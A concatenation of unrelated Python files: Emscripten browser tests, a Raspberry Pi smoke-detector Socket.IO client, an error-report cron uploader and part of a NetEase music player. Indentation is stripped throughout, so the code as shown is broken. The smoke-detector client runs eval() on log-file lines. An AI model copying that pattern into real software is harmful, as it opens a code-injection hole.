self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread_once() function.
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test against a certain thread exit time handling bug by spawning tons of threads.
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test thread-specific data (TLS).
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread condition variable creation and waiting.
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthreads are able to do printf.
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the main thread is able to use pthread_set/getspecific.
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '--shell-file', 'html.html'], timeout=30)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-g', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2', '--shell-file', 'html.html'], timeout=30)
# Test that pthreads have access to filesystem.
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args, timeout=30)
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'], timeout=30)
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'));
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT();
}
'''))
# Test that it is possible to define "Module.pthreadMainPrefixURL" string to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { pthreadMainPrefixURL: "cdn/", '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html']).communicate()
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html']).communicate()
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that sbrk() operates properly in multithreaded conditions
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print 'aborting malloc=' + str(aborting_malloc)
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=134217728'], timeout=30)
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts, timeout=30)
# Test that the proxying operations of user code from pthreads to main thread work
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test how a lot of back-to-back called proxying operations behave.
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# test atomicrmw i64
def test_atomicrmw_i64(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html']).communicate()
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1"]
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)]*256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1"]
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print opts
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.html'] + opts).communicate()
self.run_browser('test.html', None, '/report_result?0')
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
Popen([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js']).communicate()
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat');
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
try_delete('code.dat');
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print opts
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker']).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
for o in [0, 1, 2]:
print o
opts = ['-O' + str(o)]
print 'plain html'
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print 'default html'
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_split_memory_large_file(self):
size = 2*1024*1024
open('huge.dat', 'w').write(''.join([chr((x*x)&255) for x in range(size*2)])) # larger than a memory chunk
self.btest('split_memory_large_file.cpp', expected='1', args=['-s', 'SPLIT_MEMORY=' + str(size), '-s', 'TOTAL_MEMORY=100000000', '-s', 'TOTAL_STACK=10240', '--preload-file', 'huge.dat'], timeout=60)
def test_binaryen(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1'])
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args+['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1'])
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'TOTAL_MEMORY='+str(16*1024*1024), '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
|
client.py
|
import socketio
from utils.utility import uploadImg
from utils.analysis import analysis
from hardware.controller import Controller
import subprocess
import time
import threading
print("Start Running Client ...")
controller = Controller()
# standard Python
sio = socketio.Client()
host = "https://smartsmokedetection.herokuapp.com/"
# host = "http://localhost:5000"
# host = "https://c6d8171fbc15.ngrok.io"
sio.connect(host)
@sio.event
def connect():
print("Socket connected to server at " + host)
@sio.event
def connect_error():
print("The connection failed!")
@sio.event
def disconnect():
print("I'm disconnected!")
@sio.on("watch")
def watch():
# Get smoke status and call pi camera
print("Watching ...")
# Call MQ2
data = eval(readLastLog())
# Call pi camera
path = controller.get_picture()
link = uploadImg(path)
data["link"] = link
data["analysis_link"] = uploadImg(analysis(20))
print("Watched !")
return data
@sio.on("close_door")
def close_alert():
# Close the door
print("close_door")
controller.servo_close()
controller.LED_off()
return {"OK": True}
@sio.on("close_alert")
def close_alert():
# Close the alert
controller.buzzer_off()
print("close_alert")
@sio.on("test")
def test():
# Open door, led and watch
print("Start testing ...")
# controller.servo_open()
# controller.LED_on()
# controller.buzzer_on()
# SendFireMsg
data = eval(readLastLog())
sendFireMsg(data)
data["OK"] = True
return data
def sendMsg(msg): # Send Msg
sio.emit("msg", msg)
def sendFireMsg(data):
print("Sending Fire Msg")
controller.buzzer_on()
controller.LED_on()
controller.servo_open()
path = controller.get_picture()
print(path)
link = uploadImg(path)
data["link"] = link
sio.emit("fire", data)
def readLog():
f = open("result.log", "r")
while 1:
where = f.tell()
lines = f.readlines()
lastTen = lines[-10:]
for d in lastTen:
if not d:
continue
data = eval(d[:-1])
if data["CO"] > 88:
sendFireMsg(data)
break
time.sleep(10)
f.seek(where)
def readLastLog():
f = open("result.log", "r")
lines = f.readlines()
return lines[-1][:-1]
log_thread = threading.Thread(target=readLog)
log_thread.start()
|
cronerror.py
|
from events.processrepo import ProcessRepo
import threading
from threading import Thread
from configs.configs import error_cron_interval_sec, shared_storage_path, error_prefix, error_batch_size
from .cronrepo import StoreRepo
import logging
from events.errorrepo import ErrorRepo
from events.processrepo import ProcessRepo
from utils.cronjobutils import StoreUtils
import os
from datetime import datetime
from logging.config import dictConfig
log = logging.getLogger('file')
storerepo = StoreRepo()
errorepo = ErrorRepo()
storeutils = StoreUtils()
prorepo = ProcessRepo()
class ErrorProcessor(Thread):
def __init__(self, event):
Thread.__init__(self)
self.stopped = event
# Cron JOB to fetch error records from redis store and to save on object store using file-store API
def run(self):
run = 0
while not self.stopped.wait(eval(str(error_cron_interval_sec))):
log.info(f'Error Processor run :{run}')
try:
log.info('Fetching SRNs from redis store')
srn_list = storerepo.get_unique_srns()
if srn_list:
log.info(f'Error records on {len(srn_list)} SRNs present in redis store')
log.info(f'Error processing initiated --------------- run : {run}')
self.initiate_error_processing(srn_list)
log.info(f'Error Processing completed --------------- run : {run}')
else:
log.info('Received 0 SRNs from redis store')
run += 1
except Exception as e:
run += 1
log.exception(f'Exception on ErrorProcessor on run : {run} , exception : {e}')
#fetching all error records from redis, and passing on to upload service
def initiate_error_processing(self,srn_list):
try:
for srn in srn_list:
log.info(f'Creating aggregated error report for srn-- {srn}')
er_query = {"serviceRequestNumber": srn}
exclude = {"_id": False}
log.info(f'Search for error reports of SRN -- {srn} from db started')
error_records = errorepo.search(er_query, exclude, None, None)
error_records = [x for x in error_records if not x.get("uploaded")]
log.info(f'Returned {len(error_records)} records')
file = f'{shared_storage_path}consolidated-error-{error_records[0]["datasetName"].replace(" ","-")}-{srn}.csv'
headers = ['Stage','Error Message', 'Record Count']
fields = ['stage','message','count']
storeutils.write_to_csv(error_records,file,srn,headers,fields)
agg_file = storeutils.file_store_upload_call(file,file.replace("/opt/",""),error_prefix)
update_query = {"serviceRequestNumber": srn, "uploaded": True, "time_stamp": str(datetime.now()), "consolidated_file": agg_file, "file": None, "count" : None}
condition = {"serviceRequestNumber": srn, "uploaded": True}
errorepo.update(condition,update_query,True)
query = {"serviceRequestNumber" : srn,"status" : "Completed"}
#getting record from mongo matching srn, if present
completed_stats = prorepo.count(query)
#create error file when the job is completed
if completed_stats == 1:
#srn.uuid - pattern of all keys in redis
pattern = f'{srn}.*'
#getting all keys matching the patterns
error_records_keys = storerepo.get_keys_matching_pattern(pattern)
#counting keys matching the pattern, to get the count of error records on redis store against respective srn
error_records_count = len(error_records_keys)
log.info(f'{error_records_count} records found in redis store for srn -- {srn}')
keys_list=[error_records_keys[i:i + error_batch_size] for i in range(0, len(error_records_keys), error_batch_size)]
for i,keys in enumerate(keys_list):
#fetching back all the records from redis store using the srn keys
error_records = storerepo.get_all_records(keys,None)
log.info(f'Received {len(error_records)} records from redis store for srn -- {srn}')
if error_records:
zip_file,zip_file_name=self.create_error_file(error_records,srn,i)
log.info(f'Completed csv creation for srn-- {srn} ')
#forking a new thread
log.info(f'Initiating upload process for srn -- {srn} on a new fork')
persister = threading.Thread(target=self.upload_error_to_object_store, args=(srn,zip_file,zip_file_name,error_records_count))
persister.start()
#removing records from redis
remover = threading.Thread(target=storerepo.delete,args=(error_records_keys,))
remover.start()
else:
log.info(f'No new records left for uploading, for srn -- {srn}')
except Exception as e:
log.exception(f"Exception on error processing {e}")
#method to upload errors onto object store
def create_error_file(self, error_records, srn,index):
try:
csv_file = f'{shared_storage_path}error-{error_records[0]["datasetName"].replace(" ","-")}-{srn}-{index}.csv'
zip_file= f'{shared_storage_path}error-{error_records[0]["datasetName"].replace(" ","-")}-{srn}.zip'
log.info(f'Writing {len(error_records)} errors to {csv_file} for srn -- {srn}')
#writing to csv locally
headers = ['Stage', 'Error Message', 'Record', 'Original Record']
fields = ['stage','message','record','originalRecord']
storeutils.write_to_csv(error_records,csv_file,srn,headers,fields)
storeutils.zipfile_creation(csv_file,zip_file)
log.info(f"zip file created :{zip_file} , for srn -- {srn}, ")
return zip_file,zip_file.replace("/opt/","")
except Exception as e:
log.exception(f'Exception while ingesting errors to object store: {e}')
return []
def upload_error_to_object_store(self,srn,file,file_name,error_records_count):
#initiating upload API call
error_object_path = storeutils.file_store_upload_call(file,file_name,error_prefix)
if error_object_path == False:
return None
log.info(f'Error file uploaded on to object store : {error_object_path} for srn -- {srn} ')
cond = {"serviceRequestNumber": srn, "uploaded": True}
error_record = {"$set":{ "file": error_object_path, "count": error_records_count}}
#updating record on mongo with uploaded error count
errorepo.update(cond,error_record,False)
log.info(f'Updated db record for SRN after creating final report -- {srn}')
# Log config
dictConfig({
'version': 1,
'formatters': {'default': {
'format': '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s',
}},
'handlers': {
'info': {
'class': 'logging.FileHandler',
'level': 'DEBUG',
'formatter': 'default',
'filename': 'info.log'
},
'console': {
'class': 'logging.StreamHandler',
'level': 'DEBUG',
'formatter': 'default',
'stream': 'ext://sys.stdout',
}
},
'loggers': {
'file': {
'level': 'DEBUG',
'handlers': ['info', 'console'],
'propagate': ''
}
},
'root': {
'level': 'DEBUG',
'handlers': ['info', 'console']
}
})
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: omi
# @Date: 2014-07-15 15:48:27
# @Last Modified by: AlanAlbert
# @Last Modified time: 2018-11-21 14:00:00
"""
网易云音乐 Player
"""
# Let's make some noise
from __future__ import print_function, unicode_literals, division, absolute_import
import subprocess
import threading
import time
import os
import random
from future.builtins import str
from .ui import Ui
from .storage import Storage
from .api import NetEase
from .cache import Cache
from .config import Config
from .utils import notify
from . import logger
log = logger.getLogger(__name__)
class Player(object):
MODE_ORDERED = 0
MODE_ORDERED_LOOP = 1
MODE_SINGLE_LOOP = 2
MODE_RANDOM = 3
MODE_RANDOM_LOOP = 4
def __init__(self):
self.config = Config()
self.ui = Ui()
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
self.refrese_url_flag = False
self.process_length = 0
self.process_location = 0
self.storage = Storage()
self.cache = Cache()
self.end_callback = None
self.playing_song_changed_callback = None
self.api = NetEase()
@property
def info(self):
return self.storage.database["player_info"]
@property
def songs(self):
return self.storage.database["songs"]
@property
def index(self):
return self.info["idx"]
@property
def list(self):
return self.info["player_list"]
@property
def order(self):
return self.info["playing_order"]
@property
def mode(self):
return self.info["playing_mode"]
@property
def is_ordered_mode(self):
return self.mode == Player.MODE_ORDERED
@property
def is_ordered_loop_mode(self):
return self.mode == Player.MODE_ORDERED_LOOP
@property
def is_single_loop_mode(self):
return self.mode == Player.MODE_SINGLE_LOOP
@property
def is_random_mode(self):
return self.mode == Player.MODE_RANDOM
@property
def is_random_loop_mode(self):
return self.mode == Player.MODE_RANDOM_LOOP
@property
def config_notifier(self):
return self.config.get("notifier")
@property
def config_mpg123(self):
return self.config.get("mpg123_parameters")
@property
def current_song(self):
if not self.songs:
return {}
if not self.is_index_valid:
return {}
song_id = self.list[self.index]
return self.songs.get(song_id, {})
@property
def playing_id(self):
return self.current_song["song_id"]
@property
def playing_name(self):
return self.current_song["song_name"]
@property
def is_empty(self):
return len(self.list) == 0
@property
def is_index_valid(self):
return 0 <= self.index < len(self.list)
def notify_playing(self):
if not self.current_song:
return
if not self.config_notifier:
return
song = self.current_song
notify(
"正在播放: {}\n{}-{}".format(
song["song_name"], song["artist"], song["album_name"]
)
)
def notify_copyright_issue(self):
log.warning(
"Song {} is unavailable due to copyright issue.".format(self.playing_id)
)
notify("版权限制,无法播放此歌曲")
def change_mode(self, step=1):
self.info["playing_mode"] = (self.info["playing_mode"] + step) % 5
def build_playinfo(self):
if not self.current_song:
return
self.ui.build_playinfo(
self.current_song["song_name"],
self.current_song["artist"],
self.current_song["album_name"],
self.current_song["quality"],
time.time(),
pause=not self.playing_flag,
)
def add_songs(self, songs):
for song in songs:
song_id = str(song["song_id"])
self.info["player_list"].append(song_id)
if song_id in self.songs:
self.songs[song_id].update(song)
else:
self.songs[song_id] = song
def refresh_urls(self):
songs = self.api.dig_info(self.list, "refresh_urls")
if songs:
for song in songs:
song_id = str(song["song_id"])
if song_id in self.songs:
self.songs[song_id]["mp3_url"] = song["mp3_url"]
self.songs[song_id]["expires"] = song["expires"]
self.songs[song_id]["get_time"] = song["get_time"]
else:
self.songs[song_id] = song
self.refrese_url_flag = True
def stop(self):
if not self.popen_handler:
return
self.playing_flag = False
self.popen_handler.stdin.write(b"Q\n")
self.popen_handler.stdin.flush()
self.popen_handler.kill()
self.popen_handler = None
# wait process to be killed
time.sleep(0.01)
def tune_volume(self, up=0):
if not self.popen_handler:
return
new_volume = self.info["playing_volume"] + up
if new_volume > 100:
new_volume = 100
elif new_volume < 0:
new_volume = 0
self.info["playing_volume"] = new_volume
self.popen_handler.stdin.write(
"V {}\n".format(self.info["playing_volume"]).encode()
)
self.popen_handler.stdin.flush()
def switch(self):
if not self.popen_handler:
return
self.playing_flag = not self.playing_flag
self.popen_handler.stdin.write(b"P\n")
self.popen_handler.stdin.flush()
self.build_playinfo()
def run_mpg123(self, on_exit, url, expires=-1, get_time=-1):
para = ["mpg123", "-R"] + self.config_mpg123
self.popen_handler = subprocess.Popen(
para, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
self.tune_volume()
self.popen_handler.stdin.write(b"L " + url.encode("utf-8") + b"\n")
self.popen_handler.stdin.flush()
endless_loop_cnt = 0
while True:
if not self.popen_handler:
break
strout = self.popen_handler.stdout.readline().decode("utf-8").strip()
if strout[:2] == "@F":
# playing, update progress
out = strout.split(" ")
self.process_location = int(float(out[3]))
self.process_length = int(float(out[3]) + float(out[4]))
elif strout[:2] == "@E":
self.playing_flag = True
if (
expires >= 0
and get_time >= 0
and time.time() - expires - get_time >= 0
):
# 刷新URL
self.refresh_urls()
else:
# error, stop song and move to next
self.notify_copyright_issue()
break
elif strout == "@P 0":
# end, moving to next
self.playing_flag = True
break
elif strout == "":
endless_loop_cnt += 1
# 有播放后没有退出,mpg123一直在发送空消息的情况,此处直接终止处理
if endless_loop_cnt > 100:
log.warning(
"mpg123 error, halt, endless loop and high cpu use, then we kill it"
)
break
if self.playing_flag:
if self.refrese_url_flag:
self.stop()
self.replay()
self.refrese_url_flag = False
else:
self.next()
else:
self.stop()
def download_lyric(self, is_transalted=False):
key = "lyric" if not is_transalted else "tlyric"
if key not in self.songs[str(self.playing_id)]:
self.songs[str(self.playing_id)][key] = []
if len(self.songs[str(self.playing_id)][key]) > 0:
return
if not is_transalted:
lyric = self.api.song_lyric(self.playing_id)
else:
lyric = self.api.song_tlyric(self.playing_id)
self.songs[str(self.playing_id)][key] = lyric
def download_song(self, song_id, song_name, artist, url):
def write_path(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.add(song_id, song_name, artist, url, write_path)
self.cache.start_download()
def start_playing(self, on_exit, args):
"""
Runs the given args in subprocess.Popen, and then calls the function
on_exit when the subprocess completes.
on_exit is a callable object, and args is a lists/tuple of args
that would give to subprocess.Popen.
"""
# log.debug("%s,%s,%s" % (args['song_id'], args['song_name'], args['mp3_url']))
if "cache" in args.keys() and os.path.isfile(args["cache"]):
thread = threading.Thread(
target=self.run_mpg123, args=(on_exit, args["cache"])
)
else:
new_url = NetEase().songs_url([args["song_id"]])[0]["url"] #使用新地址
if not new_url: #如果没有获得新地址
new_url = args["mp3_url"] #使用老地址传给mpg123
thread = threading.Thread(
target=self.run_mpg123,
args=(on_exit, new_url, args["expires"], args["get_time"]),
)
cache_thread = threading.Thread(
target=self.download_song,
args=(
args["song_id"],
args["song_name"],
args["artist"],
args["mp3_url"],
),
)
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=self.download_lyric)
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(
target=self.download_lyric, args=(True,)
)
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def replay(self):
if not self.is_index_valid:
self.stop()
if self.end_callback:
log.debug("Callback")
self.end_callback()
return
if not self.current_song:
return
self.playing_flag = True
self.build_playinfo()
self.notify_playing()
self.start_playing(lambda: 0, self.current_song)
def shuffle_order(self):
del self.order[:]
self.order.extend(list(range(0, len(self.list))))
random.shuffle(self.order)
self.info["random_index"] = 0
def new_player_list(self, type, title, datalist, offset):
self.info["player_list_type"] = type
self.info["player_list_title"] = title
# self.info['idx'] = offset
self.info["player_list"] = []
self.info["playing_order"] = []
